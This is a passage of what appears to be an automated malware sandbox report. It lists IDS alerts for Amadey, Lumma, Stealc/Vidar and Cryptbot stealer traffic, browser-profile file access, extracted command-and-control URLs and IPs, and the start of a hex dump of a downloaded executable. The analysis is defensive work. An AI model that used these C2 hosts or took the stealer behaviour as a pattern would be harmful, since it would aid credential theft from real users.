                              Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdb source: 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003396000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000000.2814391688.0000015C06812000.00000002.00000001.01000000.00000013.sdmp
                              Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdbSHA256\u source: 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, 81d22383f9.exe, 0000000C.00000002.2959431174.0000000003396000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000000.2814391688.0000015C06812000.00000002.00000001.01000000.00000013.sdmp
                              Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: 81d22383f9.exe, 0000000C.00000000.2576935006.0000000000162000.00000002.00000001.01000000.0000000C.sdmp
                              Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: 81d22383f9.exe, 0000000C.00000000.2576935006.0000000000162000.00000002.00000001.01000000.0000000C.sdmp
                              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 6f3b41816f.exe, 00000021.00000002.3345424664.0000000000CB2000.00000040.00000001.01000000.0000001F.sdmp
                              Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: a2870b1ac5.exe, 00000007.00000000.2454581777.000000000120C000.00000002.00000001.01000000.0000000A.sdmp
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeDirectory queried: number of queries: 1001
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeDirectory queried: number of queries: 2002
                              Source: C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exeDirectory queried: number of queries: 1001
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002E36A9 FindFirstFileExW,9_2_002E36A9
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeCode function: 9_2_002E375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,9_2_002E375A
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash10755\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
                              Source: firefox.exeMemory has grown: Private usage: 1MB later: 50MB

                              Networking

                              barindex
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49758 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49764
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49786 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49794 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058397 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (pancakedipyps .click) : 192.168.2.4:51271 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49792 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49795 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49796 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49798 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49799 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49800 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49805 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49809 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49811 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49820 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49823 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:50852 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:56476 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49830 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058360 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) : 192.168.2.4:55298 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:49834 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49836 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49835 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49851 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:65076 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:59373 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49861 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49864 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49863 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49863 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49863
                              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49863 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49863
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49868 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49867 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49863 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49872 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49880 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49879 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49894 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49896 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49899 -> 185.121.15.192:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49902 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49903 -> 185.121.15.192:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49906 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49911 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058378 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) : 192.168.2.4:64030 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058364 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) : 192.168.2.4:60267 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49922 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49918 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49942 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49944 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49943 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49928 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49953 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49954 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49957 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49923 -> 212.193.31.8:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49959 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49962 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49966 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49967 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49987 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49988 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:49995 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50007 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49989 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49998 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50008 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:50005
                              Source: Network trafficSuricata IDS: 2058361 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) : 192.168.2.4:50020 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:50031 -> 185.121.15.192:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50033 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50056 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50060 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50064 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50062 -> 185.215.113.206:80
                              Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50070 -> 185.215.113.43:80
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50079 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50082 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50091 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50096 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2058398 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (pancakedipyps .click in TLS SNI) : 192.168.2.4:50094 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49794 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49794 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49799 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49795 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49795 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49818 -> 94.130.188.57:443
                              Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49821 -> 94.130.188.57:443
                              Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 94.130.188.57:443 -> 192.168.2.4:49831
                              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 94.130.188.57:443 -> 192.168.2.4:49827
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49836 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49836 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49861 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49868 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49868 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49864 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49864 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49830 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49830 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49834 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49922 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49922 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49911 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49915 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49915 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49928 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49928 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49927 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49927 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49953 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:49942 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49949 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49962 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49959 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49990 -> 104.21.67.146:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49999 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49999 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50006 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50006 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50020 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50059 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50007 -> 104.21.21.99:443
                              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50082 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50082 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50068 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50066 -> 104.21.91.209:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50094 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50079 -> 172.67.209.202:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50079 -> 172.67.209.202:443
                              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
                              Source: Malware configuration extractorURLs: sustainskelet.lat
                              Source: Malware configuration extractorURLs: grannyejh.lat
                              Source: Malware configuration extractorURLs: crosshuaht.lat
                              Source: Malware configuration extractorURLs: rapeflowwj.lat
                              Source: Malware configuration extractorURLs: necklacebudi.lat
                              Source: Malware configuration extractorURLs: energyaffai.lat
                              Source: Malware configuration extractorURLs: pancakedipyps.click
                              Source: Malware configuration extractorURLs: aspecteirs.lat
                              Source: Malware configuration extractorURLs: discokeyus.lat
                              Source: Malware configuration extractorURLs: http://www.microsoft.com0
                              Source: Malware configuration extractorIPs: 185.215.113.43
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 21 Dec 2024 21:16:09 GMTContent-Type: application/octet-streamContent-Length: 2668544Last-Modified: Sat, 21 Dec 2024 08:45:32 GMTConnection: keep-aliveETag: "6766802c-28b800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 ca 47 72 61 ab 29 21 61 ab 29 21 61 ab 29 21 13 2a 2a 20 6c ab 29 21 13 2a 2c 20 f5 ab 29 21 13 2a 2d 20 72 ab 29 21 70 2d 2a 20 73 ab 29 21 70 2d 2d 20 71 ab 29 21 70 2d 2c 20 47 ab 29 21 13 2a 28 20 64 ab 29 21 61 ab 28 21 3f ab 29 21 e2 2d 21 20 60 ab 29 21 e2 2d d6 21 60 ab 29 21 e2 2d 2b 20 60 ab 29 21 52 69 63 68 61 ab 29 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f4 a8 65 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 aa 26 00 00 1c 02 00 00 00 00 00 50 a5 23 00 00 10 00 00 00 c0 26 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 